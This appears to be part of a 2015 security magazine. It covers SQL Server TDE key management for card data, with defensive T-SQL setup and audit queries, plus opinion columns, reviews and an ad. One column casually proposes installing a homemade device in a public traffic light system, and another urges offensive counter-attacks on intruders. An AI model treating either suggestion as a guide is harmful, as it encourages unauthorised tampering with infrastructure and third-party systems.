SQL SERVER 2008 TRANSPARENT DATA ENCRYPTION OFFERS FULL DATA ENCRYPTION
“Transparent data encryption (TDE) performs real-time I/O encryption and decryption of the data and log
files. The encryption uses a database encryption key (DEK), which is stored in the database boot record
for availability during recovery. The DEK is a symmetric key secured by using a certificate stored in
the master database of the server or an asymmetric key protected by an EKM module. TDE protects data
“at rest”, meaning the data and log files. It provides the ability to comply with many laws, regulations, and
guidelines established in various industries. This enables software developers to encrypt data by using AES
and 3DES encryption algorithms without changing existing applications.”
When choosing to enable TDE in your environment there are a number of factors to consider during the
implementation. First, TDE only secures data at rest and does nothing to protect the data in transit (such as
during remote ODBC queries).
Second, the certificate used to encrypt the data is required during any attempt to decrypt the data. Third,
complete and accurate backups of the certificate are required to minimize the risk of data loss. Backups of
the database itself will be encrypted and will require the certificate as well.
USING MANUAL KEY MANAGEMENT
If you are using manual key management, several steps will be required. You will need to create a database
master key in the master database (be sure to use a strong password to protect the key). The database
master key you have created will be used to protect the TDE certificate. You are now ready to back up the
master database master key to a removable disk and store it in a safe location.
At this point, you are ready to create a certificate in the master database protected by the database master
key. Once again, remember to back up the certificate to a removable disk and store it in a safe location.
Only users who need access to cardholder data should be given permissions to any keys and certificates
used to decrypt sensitive data.
As noted above, encryption keys may be managed manually or through an encryption key management
software package in SQL Server 2008.
In the case of SQL Server, the TDE Database Encryption Key must be replaced at least once per year.
You will need to generate or load a new certificate or asymmetric key, back up the certificate, and re-encrypt
the Database Encryption Key using the new certificate.
It is important to make sure to keep backups of prior certificates as those will be required to restore copies
of the database made when those certificates were active. Keep in mind this is also required when using
EKM generated asymmetric keys; however, the EKM provider should have features for managing this.
First, any user who can back up keys and certificates should have write access to the backup folder location,
but be denied read access to that location. Second, users with access to the key and certificate backup
folders should be denied access to any backups of the database. To make certain that this is the case,
the user who backs up the database should not be the same user who backs up the certificates.
At a high level, if an organization is using manual key management, the key must be stored on tamper-evident
media, or in a tamper-evident container. In some instances something as simple as a pressure-sealed
envelope may suffice. The keys must also be placed under dual control. An example of dual control might
be a key file an organization has placed in a “lockbox” inside of a safe. The key to the lockbox and the key
to the safe would be given to separate individuals. Thus two people are required to act in concert to recover
the key. Lastly, any plaintext instances of cryptographic keys must be under split knowledge. Split knowledge
requires that no single individual has access to the entire plaintext key.
Using our “lockbox in a safe” example, split knowledge might require that the actual key is stored in two
“halves”, potentially in separate lockboxes inside the safety deposit box. Looking at what this means
for SQL Server when using manual key management: first create a database master key in the master
database. Be sure to use a strong password to protect the key, with parts of the password entered by two
individuals. The database master key you have created will be used to protect the TDE certificate. You are
now ready to back up the master database master key and/or the TDE certificate to removable media. Be
certain to store it in a safe location, and employ secure storage mechanisms meeting the requirements of
tamper evidence, dual control and split knowledge referenced above. At this point, you are ready to create
a certificate in the master database protected by the database master key. Once again, remember to back up
the certificate to removable media and store it securely. When using manual key management, careful
consideration must be given to access to the data-encrypting keys and key-encrypting keys so that your
organization can achieve a proper implementation of split knowledge. For example, it may be required to
have two individuals present to enter portions of the password assigned to the backup certificates. A similar
requirement may exist for access to service accounts which can access the keys. Remember to carefully
consider which users or service accounts have sufficient access to the database boot record (where the DEK
is stored), as that will be the “key to the kingdom”.
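The manual key-management procedure described above, written out in T-SQL for SQL Server 2008 as an added example (this is not code from the article or from Microsoft); the database name CardholderDB, the certificate names, the file paths and the bracketed password placeholders are assumptions, and the passwords are the values the two custodians would each supply half of:

```sql
-- Added example: TDE with manual key management on SQL Server 2008.
-- CardholderDB, E:\KeyBackups and all '<...>' passwords are placeholders.
USE master;
GO
-- 1. Database master key (DMK) in master.  Under split knowledge, two custodians
--    each type half of the password; nobody sees the whole value.
--    The DMK also stays protected by the service master key so TDE can open it
--    unattended at service start; the password is needed for DMK backup/restore.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<custodian-A-half><custodian-B-half>';
GO
-- 2. Back the DMK up to removable media straight away.  The backup gets its own
--    password, which goes into the dual-control lockbox, not onto the same media.
BACKUP MASTER KEY TO FILE = 'E:\KeyBackups\master_dmk.key'
    ENCRYPTION BY PASSWORD = '<dmk-backup-password>';
GO
-- 3. Certificate in master, protected by the DMK; it will encrypt the DEK.
CREATE CERTIFICATE TDE_Cert_2015
    WITH SUBJECT = 'TDE certificate for CardholderDB (2015)',
         EXPIRY_DATE = '20160630';
GO
-- 4. Back the certificate up WITH its private key.  Without this pair no
--    encrypted backup of the database can be restored on another instance.
BACKUP CERTIFICATE TDE_Cert_2015
    TO FILE = 'E:\KeyBackups\TDE_Cert_2015.cer'
    WITH PRIVATE KEY (
        FILE = 'E:\KeyBackups\TDE_Cert_2015.pvk',
        ENCRYPTION BY PASSWORD = '<pvk-backup-password-2015>');
GO
-- 5. Database encryption key (DEK) inside the cardholder database, stored in
--    the database boot record and protected by the server certificate.
USE CardholderDB;
GO
CREATE DATABASE ENCRYPTION KEY
    WITH ALGORITHM = AES_256
    ENCRYPTION BY SERVER CERTIFICATE TDE_Cert_2015;
GO
ALTER DATABASE CardholderDB SET ENCRYPTION ON;
GO
-- 6. Verify.  encryption_state 2 = encryption in progress, 3 = encrypted.
SELECT DB_NAME(database_id) AS db, encryption_state, key_algorithm,
       key_length, percent_complete
FROM sys.dm_database_encryption_keys;
GO
-- 7. Annual rotation: new certificate, back it up, then re-encrypt the DEK with
--    it.  Keep the 2015 certificate backup: restoring a 2015-era database
--    backup still requires the certificate that protected the DEK at that time.
USE master;
GO
CREATE CERTIFICATE TDE_Cert_2016
    WITH SUBJECT = 'TDE certificate for CardholderDB (2016)',
         EXPIRY_DATE = '20170630';
BACKUP CERTIFICATE TDE_Cert_2016
    TO FILE = 'E:\KeyBackups\TDE_Cert_2016.cer'
    WITH PRIVATE KEY (
        FILE = 'E:\KeyBackups\TDE_Cert_2016.pvk',
        ENCRYPTION BY PASSWORD = '<pvk-backup-password-2016>');
GO
USE CardholderDB;
GO
ALTER DATABASE ENCRYPTION KEY
    ENCRYPTION BY SERVER CERTIFICATE TDE_Cert_2016;
GO
```

Run steps 1 to 6 once at installation and step 7 at each yearly key change; the account that runs steps 2 and 4 should be the one with write-only rights to E:\KeyBackups, and a different account should take the database backups.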
The environment should also satisfy the following:
• sa login disabled when using Windows Authentication mode
• BUILTIN\Administrators group not a member of the sysadmin role
• Use of signed modules
• Role-based access
• Hard segregation of duties, with segregation matrices, evidence, etc.
• Hardening of the database configuration; as a reference, compliance with the Microsoft SQL 2008 Server
Hardening Guide, Version 1.0.0, 19 May 2011
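An added T-SQL check for the first two items of this list (not from the article); it runs against the catalog views of a SQL Server 2008 instance, and the PASS/FAIL wording is my own convention:

```sql
-- Added example: audit the sa login and the BUILTIN\Administrators membership
-- described in the checklist.  Needs VIEW ANY DEFINITION or sysadmin to read
-- sys.server_principals completely.

-- 1. Is sa disabled?  The login may have been renamed, so match on its fixed
--    SID (0x01) instead of on the name.
SELECT name,
       is_disabled,
       CASE WHEN is_disabled = 1 THEN 'PASS'
            ELSE 'FAIL: sa login is enabled' END AS result
FROM sys.server_principals
WHERE sid = 0x01;

-- 1b. Windows Authentication mode only?  1 = Windows-only, 0 = mixed mode
--     (with mixed mode the sa password becomes a remote attack surface).
SELECT SERVERPROPERTY('IsIntegratedSecurityOnly') AS windows_auth_only;

-- 2. Is BUILTIN\Administrators a member of sysadmin?  Zero rows = PASS.
--    SQL Server 2008 setup no longer adds the group, but instances upgraded
--    from 2000/2005 often still carry it.
SELECT r.name AS role_name, m.name AS member_name,
       'FAIL: local Administrators are sysadmin' AS result
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
  AND m.name = 'BUILTIN\Administrators';

-- 2b. While here: list every sysadmin member so the segregation-of-duties
--     matrix can be reconciled against the people who actually hold the role.
SELECT m.name AS member_name, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.name;
```

Query 2 only sees direct membership; if the group was granted sysadmin through another Windows group, query 2b and the group's membership in Active Directory have to be compared by hand.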
About the Authors
Darko Mihajlovski
MSc EE, C|EH, Certified Lead ISO27001:2013 Auditor.
He has been working as a Chief Information Security Officer in a large company for the past six years and
is also involved, as an Information Security Professional, in information security projects intended primarily
for improving IS management in other companies. He is an ISMS expert in the field of implementing
ISO27001:2005 and PCI DSS 2.0, and is experienced in auditing information systems, incident management,
audit trail analysis and penetration testing. Head of Information Security Department, Halkbank AD
Skopje, [email protected].
Kiril Buhov
MSc PM.
Head of Information Systems and Technical Support Department, Halkbank AD
Skopje, [email protected].
Jani Nikolov
MSc.B.
Head of Card Processing and Alternative Channels Department, Halkbank AD Skopje,
[email protected].
Hacking Journalists
by Bob Monroe
There was a time when a reporter was called a hack. This term referred to their ability to
hack away on a typewriter to create a story on a short deadline. Somewhere in the 1950s,
MIT’s Railroad Club adopted the term when they saw a cool use of technology. Railroads
helped to build the world and spread commerce across the globe. This was a proud term, a
name for an action that you could be pleased to have been associated with. Then, somewhere
along the way, the hack name started to be used for criminal internet activity. Today, a hacker is someone
to be put in jail just for being called that nasty name.
Security vendors use slogans like “Stop Hackers in their Tracks” and “Fight Hackers Where They Attack”.
Okay, maybe these are termite pest control slogans but the meaning is the same: hackers are bad people,
according to the press. The problem is that hackers aren’t bad people. Bad people are bad people. There
is a huge difference between a hacker and a criminal. Some hacks actually save lives.
Here is a nice hack for you: There is a microcontroller board called the TouchBoard made by Bare
Conductive. I bought two of them when Radio Shack started selling off their inventory around here.
Each board cost me $10. Basically the board is a sensor controller. The device has twelve touch sensors that
connect to a processor, and the operating system is stored on a microSD card. When powered up with
headphones or speakers attached, if you touch one of the sensors, a song is played from the storage card.
You can change out the songs just by renaming and copying your songs over the ones on the tiny media card.
If you press one sensor you get some jazz music. You touch another and you get some Frank Sinatra. A third
sensor plays a symphony. You get the idea. Twelve sensors, twelve outputs. But with this board, there are
two other output modes on the circuits.
How can we hack this?
Let’s say you live in a home where you’ve installed this $10 board to act as a sensor controller. When you
step into your home, an IR detector senses your presence and activates the first touch sensor. This sensor
is wired to your air conditioning unit. It is preset to turn on at 22 degrees Celsius when activated.
Walking in the front door activates this first environmental device.
The second sensor is already activated because it is wired to a light sensor outside your house. It just detects
whether it is light or dark outside. Since you work long hours, you often come home late to a dark house.
Since this sensor is already activated, when you walk in the front door, that switch is tripped and lights turn
on to illuminate your hallway.
So we have two sensors working now. Let’s look at the third sensor on the twelve sensor device.
This third sensor is wired to your media player. You like to come home to some music. When you enter
your front door the third sensor is activated and your media player is already programmed to play some nice
heavy metal or Danish folk songs, your choice. Right there we’ve turned a $10 MP3 player into a home
automation platform, or a smarthome as the media would call it.
Now, let’s take this same hack to another level – that’s what hackers do, we try new things with existing
technology.
Around where I live, we have a problem with cars running red lights. As a hacker, I never want to see
anyone hurt so I want to come up with an easy solution to stop this reckless problem. I install the same
$10 TouchBoard in the traffic light management system located near the sidewalk. Next, we set up an
inexpensive IR beam by the traffic light that shines down at an angle onto the pavement below. A beam like
this would cost around $3 at Radio Shack. Next to the beam we install a Passive Infrared Detector (PID)
which also costs a whole $11 at Radio Shack.
The IR beam hits the pavement and is reflected back to the PID. IR is great at detecting heat and motion,
like an on/off switch but with precision. Next, we set up a small algorithm that can determine the speed of
an approaching vehicle. When a vehicle enters the beam field as the traffic light begins to turn from green
to yellow, a calculation is made to determine the speed of that approaching traffic. We can easily figure out
whether that incoming car will be able to stop in time to meet the coming red light.
If that vehicle is moving too fast to brake safely for the red light, it’s simple human nature that the driver
will run the red light. We have the statistics to back those numbers up. When that speeding traffic is sensed
and it is determined that it will not be able to stop safely at that red light, the first TouchBoard sensor is
activated. This activation tells the traffic control box to turn all traffic lights red and keep them all red for
three to four seconds. We don’t want any other traffic to move into the intersection, so all lights remain red.
As the red-light runner enters the middle of the intersection, there is another IR and PID sensor attached to
a camera that takes a lovely picture of the license plate, with the red glow of the light. That nice picture is
sent via email to the local traffic enforcement agency who will send that driver a wonderful letter in the mail
along with a fine. That is the second sensor on the TouchBoard being activated.
On the far end of the intersection, there is a third set of IR and PID sensors. These determine that the
offending vehicle has left the danger area of the intersection. This trips the third TouchBoard sensor which
plays some jazz music and tells the traffic management system to reset the system and return to normal
operations.
With a simple $10 TouchBoard, we’ve played some music, automated your house and saved a couple
of lives. All by just doing some simple hacks. Please, the next time you are persuaded to think of hackers
as criminals, remember that even hackers like Danish folk songs. Or something like that.
Hack and don’t talk smack.
About the Author
Bob Monroe grew up in Southern California before he joined the U.S. Army in 1985. One of Bob’s first
military assignments introduced him to the world of hacking. His prankster ways ended abruptly in 1996
when he was almost caught hacking by an eighty-two-year-old librarian. This incident led to a renewed
interest in cyber security, as a good guy. Since then, he has written several articles for publication and
maintains a passion for digital security. Bob holds a Master of Science in Information Assurance from
Norwich University. Bob’s specialty is cyber teaching and security awareness training. Along with work
for the U.S. Army, he has taught security classes for the Veterans Administration, Military District of
Washington, Commandant of the Marine Corps and staff, as well as countless others across the world. He
holds a U.S. Patent for airport security automation technology that combines radar and thermal imaging
to protect aircraft movement areas and the surrounding airspace. This patent does not impress the TSA
folks at all and usually gives them a reason to strip search him instead. Bob works with the Institute for
Security and Open Methodologies (ISECOM.org) and Hacker High School as an editor and writer. Both
organizations are non-profit, with the mission of teaching computer security methods across a global
audience. In his spare time, Bob makes children’s toys in his small woodshop. He still has all nine fingers,
too. Oops, make that seven fingers.
Offended by Offensive Security
by Bob Monroe
The commonly held belief in the realm of digital security (cyber security for the new folks
and media) is that the methods employed are strictly defensive in nature. Networks prepare
for and wait for an attack, defend against the attack, respond as needed and maybe even
report the attack to the authorities. If the attack was successful and not detected, the
authorities contact the network in a reverse fashion. This process repeats itself thousands
of times a day across the world.
Rates of actual convictions for computer crimes range from 89%[1] for small countries to 5% for larger ones[2].
This does not reflect the actual number of people accused of committing such crimes, only the total number
of people charged with such crimes who are convicted in a court.
IBM’s X-Force Threat Activity Exchange[3] shows current malicious activity across all monitored and reported
IP addresses across the globe. At any given moment, there are hundreds of attacks represented on the
exchange in a lovely colored chart of the world. There is nothing new in this information, just a different
way to express it.
Defensive posturing is the art of fortifying assets with multiple types of protection. In the physical world,
there are walls, barbed wire, security guards with vicious attack dogs, doors, walled doors with vicious
attack dogs and so forth. The digital world has firewalls, intrusion detection systems, packet sniffers, access
controls, and authentication methods, but sadly no vicious attack dogs. Networks combine these physical
and digital products in a constant game of trying to protect their assets.
We already know how well that is working out for them. Target, Sony, Coca Cola, Starbucks and all the
banks out there have been in the headlines for being attacked.
Law enforcement expects organizations and people to perform due diligence on protecting their assets.
Leaving your valuable jewelry out in the open in public will be frowned upon by the police detective who
has to write that theft report. Likewise, not changing the default password on a network switch or VMware
server will also cause dismay from the shareholders as they pay out law suits for loss of data.
Due diligence is much like the cave people huddled around a fire during the dark of night. They expect the
fire (law enforcement) to protect them from the vicious attack of carnivores as they circle around the flames.
As the evening wears on, the flames must be stoked and maintained, which means somebody has to go get
more firewood. Those who go to get that firewood may not come back because they’ve ended up a meal for
something else.
This means the fire is limited in scope and resources. Law enforcement can only do so much with what they
have. As the animals see the fire wane, they approach closer and begin picking off one cave person at a time.
If one of the animals catches fire, the cave people at least get a buffet for their efforts. This is little comfort
since each night this same routine repeats itself. The fire is only a single tool and cannot be expected to
protect everyone against all hungry animals out there. We must look at another method.
Offensive security has had a bad reputation for many years. It is considered vigilantism by some. Others will
say that you are taking the law into your own hands. There are political and legal issues with reprisal against
the wrong parties, if you counter attack. The arguments are endless, yet nothing really seems to change the
cyber security environment except more high profile attacks. Argue all you want, changes only happen when
someone is willing to make those changes.
Paul Asadoorian and John Strand offered a solution at the 2012 RSA convention[4]. Their approach was
to suggest three phases of annoyance, attribution and attack to ward off malicious intruders. The presenters
acknowledged that the same tools penetration testers use could be employed as offensive weapons. They also
suggested tagging data and documents with web bugs to activate whenever that asset was used outside the
intended environment. This is similar to the ink bombs used on department store merchandise that explode if
the garment leaves the perimeter.
This is also very much like the ink packets used in banks that stain money stolen during a heist.
Is that offensive security or just good advice? Both.
There has never been a battle in the history of war won by waiting for the enemy to attack first. If you
happen to wait for the enemy, then it is called an ambush and you have the upper hand due to the element
of surprise and firepower. No military commander has ever told their troops to sit and wait for the enemy to
strike first. There is no tactical advantage to such a strategy but security professionals are expected to do this
exact same thing each and every day. We wait and then respond. We add more kindling to the fire, hoping we
don’t get eaten next.
It’s a little like watching a horror movie. You know that the victim shouldn’t go down into the basement
alone, but they do anyway. Doesn’t the sound of a chain saw and screams give the victim the slightest hint
that bad things are happening in the basement? But there they go, armed with a faulty flashlight and no cell
phone signal, to their doom, over and over again.
Forgive the bluntness but this is stupid. Defensive security is no way to go through life. We tell our kids not
to be victims of bullies, we tell them to stand up to school thugs. We don’t practice what we preach, though.
Even police departments in the U.S. have paid ransoms to get their data back from ransomware thieves. The
fire itself has gotten burned.
At what point are you going to stop playing the game where you don’t even know the rules? Penetration
testing is not the same as an attack. A penetration test has a scope with limitations and boundaries. An
attack has a goal and no time limit. In order to conduct a proper security test, you must use the Open Source
Security Testing Methodology Manual (OSSTMM). If you want to prove trust in your network, you have to
have a scientific and mathematically proven method instead of just some cool software.
Stop waiting for the bad man to go away. He isn’t going to leave. Start conducting proper security testing
and become active in your role as a security professional. Grab the OSSTMM and start pursuing the animals
eating all your friends. That fire is not getting any bigger.
[1] http://saitnews.co.za/e-government/cybercrime-conviction/
[2] http://www.oneindia.com/feature/conviction-rate-cyber-crime-is-0-5-per-cent-here-are-the-reasons-1609728.html
[3] https://exchange.xforce.ibmcloud.com/
[4] http://whatis.techtarget.com/definition/offensive-security
Shouting at the Security Waves
by Bob Monroe
At the RSA convention in April, I met a wonderful European gentleman named Knud. The ‘K’
in his name is pronounced. Knud told me the story of a Viking king who was known for
shouting at the waves. According to several documented accounts, this king would make it
his mission to order the waves to cease at his command. The Viking lord was spotted many
times standing on top of a cliff yelling at the waves below to stop. For what purpose, we
will never know. We do know that the waves did not stop and have not stopped for any man
beyond religious accounts.
No mortal man has ever been able to command the ocean to bend to his will. But that would be a cool trick
to witness.
The biggest question here is why a noble man would even try to stop these forces of nature. Because
he thought he could? Because he thought he had some magical power? Because he was trying to prove
a point, maybe?
In digital security, we often find ourselves trying to shout at the waves as well. We go to training, attend classes,
buy new software, add all sorts of cool gadgets, in hopes that we, too, can control the waves of security woes.
This is not just an uphill battle; it’s a battle you can’t win with the way things are going now.
No, this article isn’t about FUD. It’s about the reality of futility. RSA had an estimated 35,000 attendees last
week. Of those thousands, I only saw a few African Americans. I saw a small percentage of women make up
the crowd. Except in one case, I did not see a single teenager. Why is that?
The last time I looked, there was a significant part of our population that isn’t white and male. So why
is digital security dominated by old white guys when the real world doesn’t look anything like that? Amit
Yoran of RSA had a talk about the need for a new map in the field of cyber security. How about we start
by populating that map with a better representation of the real world? We can add some minorities to the
workforce. We can increase the number of women in this profession. Maybe even give them equal pay
for equal work.
While Mr. Yoran has you sitting in the dark1 when it comes to security, we at the Institute for Security and
Open Methodologies have created a free teaching platform for teens. If we want a new shift in thinking, if we
want the waves to actually stop, we need to come up with a new solution. At Hacker Highschool2, we have
a new solution and it’s called free education. There are all kinds of lessons for teens to download that will
teach them about the digital security profession. These lessons are free to download and are translated into
twenty-two languages.
The lessons do not teach any particular product or vendor; we teach our students to think for themselves.
The lessons do not endorse sitting in the dark, waiting for an opportunity. Instead we teach something called
trust. Trust is established by implementing the ten operational security controls listed in the Open Source
Security Testing Methodology Manual (OSSTMM). This is an unbiased evaluation of any device, network,
or product down to the chip level.
You, the evaluator, get to determine whether something is trustworthy or not. The vendor marketing terms
and fancy words fall to the side when you use the free OSSTMM. This is what we are teaching at Hacker
Highschool. We are teaching the next generation of digital security professionals to question every firewall,
every protocol, every chip on every device and every means of communication to see if they are trustworthy.
The OSSTMM uses a simple mathematical formula to remove any doubt that could add opinion over fact.
1 http://www.rsaconference.com/blogs/rsas-amit-yoran-security-is-stumbling-around-in-the-dark
2 hackerhighschool.org
Our lessons at Hacker Highschool have reached 6 million downloads. Of those downloads,
only 2% are from the U.S. Why is that? Why is it that China understands the importance of teaching their
youth about security but the U.S. does not? Europe and Asia also understand this critical shortfall, but
America does not. We don’t ask for your race, gender or financial background to download our free material.
We just want you to learn.
Hacker Highschool has the lessons, the teacher training material and the certifications backed by the Institute
for Security and Open Methodologies (ISECOM.org).
We want you to stop shouting at the waves and shine some light into the darkness. The new map belongs
to our future and we need to start teaching them about the mistakes we already made. For those who are
asking who I am, I’m an unpaid volunteer for Hacker Highschool, as all of us are. We believe in this cause
but we need your help. Help us to help you. Teach the next generation of teens about our field. Shine some
light onto their faces and watch them learn.
A little knowledge goes a long way.
RGB LED Lighting Shield with XMC1202
for Arduino
Reviewed by Bob Monroe
This little board is powered by an ARM Cortex-M0 processor, which means it has
programmable functions but sips power. Don’t confuse the Cortex-M0 with Intel’s Core M
processors, even though this processor is a 32-bit core running at 32 MHz. This isn’t lightning fast,
however, this board isn’t designed as a graphics card. It’s designed to be a programmable
LED controller. To program the board and run it, you have to have an Arduino board or you
can use Infineon’s own XMC1100 Boot Kit.
The XMC1100 Boot Kit is made for the XMC1202 shield, so the two sit on top of each other. This is pretty much what
all microcomputers do: they allow boards to stack on top of each other, connected via GPIO, serial
or other direct methods. There is speed in doing this, since the boards are physically attached and share
input and output. Since the XMC1202 has its own programmable processor, that processor can add to the
microcomputer’s own computation power, almost like a GPU would.
This frees up the main processor to focus on other tasks instead of having to compute graphics data. Think of
it as having your own personal assistant. That assistant can pick up duties you don’t have time for, so it frees
you up to do other things, like play with other add-on boards and write cool code.
The board is screaming red in color. It almost hurts your eyes to look at. Infineon and a few other companies
have been doing this flaming color thing for one reason or another. I guess it helps you find the board if you
ever misplace it. I’m talking ultra-bright red. The type of red that usually signals danger. Luckily, the board
isn’t a danger, just really bright.
I noticed quite a bit of empty space on the board; what I would consider to be wasted space because I like
my boards to be packed with every sensor and gadget available. The XMC1202 does one thing but it does it
well. It controls LEDs. This means you have an assortment of options with a programmable LED board. You
are a little limited on the pin count, though, so make your connections count.
If you are interested in controlling all of the lighting in your home or small office, this board is for you. If
you want to set up a cool LED display that says what a great programmer you are, this is the board for you. The
XMC1202 can control up to three different LED channels at a time. This means you can configure a string of
red LEDs to flash, while a strand of blue LEDs pulse and your green LEDs orbit in a loop. There, you have a
nice Halloween costume or a funky outfit for your dog.
I was a little surprised by the heat put off by the board during my testing. The buildup isn’t terrible but it
would be something to take into consideration if your poor dog were wearing an outfit using this dev board.
The LEDs don’t really put off any heat but they did make my dog look at me really funny when they started
to flash. He tried to bite them. It was funny to see his mouth light up as the LEDs pulsed.
The XMC1202 has some of the pin outs marked so you know what they do. It also helps that the red monster
has connector holes to stack onto the other boards. There is about a ½ clearance that you will need to take
into consideration where the wires are connected. I found this additional space useful to help move some of
that excess heat away from the main board. The space uses plastic parts so you don’t need to worry about
making extra sparks if the two boards touch. I’ve seen other addon boards that seem to have forgotten that
electricity likes to move through metal parts. It’s always fun to see some sparks but never from your own
device or your dog.
The XMC doesn’t have any switches for power or reset. This isn’t a big problem, since you can program
which conditions turn on the board and which ones shut it down. Remember that the LEDs will need their
own power source. The board says it can provide the power at 5 V, but unless you plug in a power supply
rated at 1.5 A, get your own power for the LEDs. It’s just easier that way. Unless you want to add on
some capacitors: charge, zap, charge, zap. You get the idea.
I did run into another small problem, I don’t have tiny hands. I know these are microcomputers. I know they
are supposed to be small but do they really have to make connectors that small? I had to use a magnifying
glass just to insert the wire leads. A big magnifying glass and a big flashlight, even though the board puts off
its own light with the red color.
Luckily, the manufacturer understands that some of us have normal-sized hands. For that, they made the
wire connections with nice plastic screw tighteners. These little screws keep the LED wires from slipping
out of the connector that I spent years (not really, more like a few seconds) trying to get in place. They hold
the LEDs very securely, considering that they are plastic. I was surprised at how well the connections held the
wires, especially since I’m not the most careful person I know. You don’t even want to know what my lab
looks like. Imagine Tokyo after Godzilla ate a ton of bean burritos. That’s how badly my lab is organized, so
stuff gets tangled up all the time.
The Infineon RGB shield was able to survive my lab, my hands, my dog and my endless curiosity. This is a
cool add-on board for Arduino projects. One thing I really wanted to hack was not using LEDs but hooking
up other low-power devices and using the board’s signaling capabilities. If I can pulse, blink, and orbit LED
lights, what is keeping me from using the same technique to control an IR light or radio signal for a mini
radar device? Nothing, just your imagination. That is the best part of hacking: you build whatever you want.
Security in Computing by Charles
P. Pfleeger, Shari Lawrence Pfleeger
and Jonathan Margulies
Reviewed by Bob Monroe
I read and review about 30 books a year on average, plus spend most of my days researching
and writing about digital security. I’ve been doing this routine since 1989 so I have a so-so
understanding of cyber security. Security in Computing took me by surprise since it looked
like the average security 101 book I read way too often. This book is nothing like any security
book I’ve read before except a few dissertation pieces I’ve picked up.
The 910-page book is filled with heavy research and plenty of great real-world examples. One of the first
things I noticed was that many of the references were from the 1960s, 70s, 80s and 90s. This tells me that
the authors went back to old-school style and not just internet searches for content. If you do nothing else,
get this book just for the bibliography. It is amazing because it is filled with old ideas that we still haven’t
learned in security.
From a depth standpoint, this book should be mandatory reading for anyone after they obtain their CISSP.
The Pfleegers and Margulies do a great job of presenting deeper understandings of security concepts along
with pictures and examples from recent security failures. They stick to the basics of confidentiality, integrity
and availability (CIA) but build off of those to show the reader how those concepts extend to a much wider
field of study.
This is not a classroom textbook; this is a manual on digital security with all the juicy stories that didn’t
make the headlines and all the original papers written before blogs existed. You will find exercises at the end
of each chapter that are fairly well written, but it’s kind of difficult to complete the exercises when your jaw
is still on the floor. There is just too much great information on each page not to laugh (or cry) to yourself
about how far we haven’t come in this field.
Security in Computing is in its fifth edition, which just came out a few months into 2015. The ink is still wet,
but I didn’t see much updated information from the fourth edition. But then again, security hasn’t fixed many
mistakes in the two and a half decades I’ve been in it, so I figure there aren’t many new catastrophes to talk
about. Sony is still messing up; that hasn’t changed. Passwords are still weak. Applications are still poorly
written. Hardware has bugs at the firmware level. I’m hard pressed to think of anything new to add that isn’t
already covered in this huge book.
I guess they could have talked about Hillary Clinton and her private email server or Target’s data breach, but
that would just remind us of other security errors from the past. One of my favorite parts of this book is how
each topic is clearly explained but not dumbed down. I’m not the brightest guy, but I do like the author to
write at the appropriate level. The diagrams and pictures are helpful if you are really into flow charts. Some
are even pretty funny.
Across the board, there isn’t a topic that wasn’t covered in this book. Okay, there were some things that
could have been added, but nothing that would make a big difference to this high-quality book. Just to give
you an idea of how big the reference material is: there are 27 pages of bibliographic information at the back
of the book, all written in fine print. I needed to wear two pairs of glasses to read some of those resources.
If you are interested in learning a heck of a lot more about our history and future as security professionals,
you’ll need this book. You will not pass any certification, get any special initials after your last name, or
even earn a promotion for reading this book. However, if you are passionate about this field, I highly suggest
you buy this book and read it. Older folks will appreciate the nods to those who taught us. Younger readers
will appreciate where we came from before security vendors took over this profession.
Learn what’s new in
SharePoint and Office 365!
SharePoint in the Cloud?
On Premises? Or Both?
Come to SPTechCon Boston 2015 and learn about the
differences between Office 365, cloud-hosted SharePoint,
on-premises SharePoint, and hybrid solutions and build your
company's SharePoint Roadmap!
August 24 -27, 2015
BOSTON
Over 70 classes
taught by expert speakers!
“This was a great conference that addresses all levels, roles and
abilities. Great variety of classes, great presenters, and I learned
many practical things that I can take back and start implementing
next week.”
—Kathy Mincey, Collaboration Specialist, FHI 360
Looking for SharePoint 2013 training?
Check out these targeted classes!
• Custom SharePoint 2013 Workflows that Use the SharePoint 2013
REST API
• SharePoint 2013 Farm Architecture and Visual Studio for Admin
• Creating a Branded Site in SharePoint 2013
• SharePoint's New Swiss Army Knife: The Content Search Web Part
Moving to Office 365?
Here are some targeted classes for YOU!
• Baby-Stepping Into the Cloud with Hybrid Workloads
• Demystifying Office 365 Administration
• Document Management and Records Management for Office 365
• Office 365 Search in the Cloud
MASTER THE PRESENT, PLAN FOR THE FUTURE! REGISTER NOW!
A BZ Media Event
SPTechCon™ is a trademark of BZ Media LLC. SharePoint® is a registered trademark of Microsoft.
www.sptechcon.com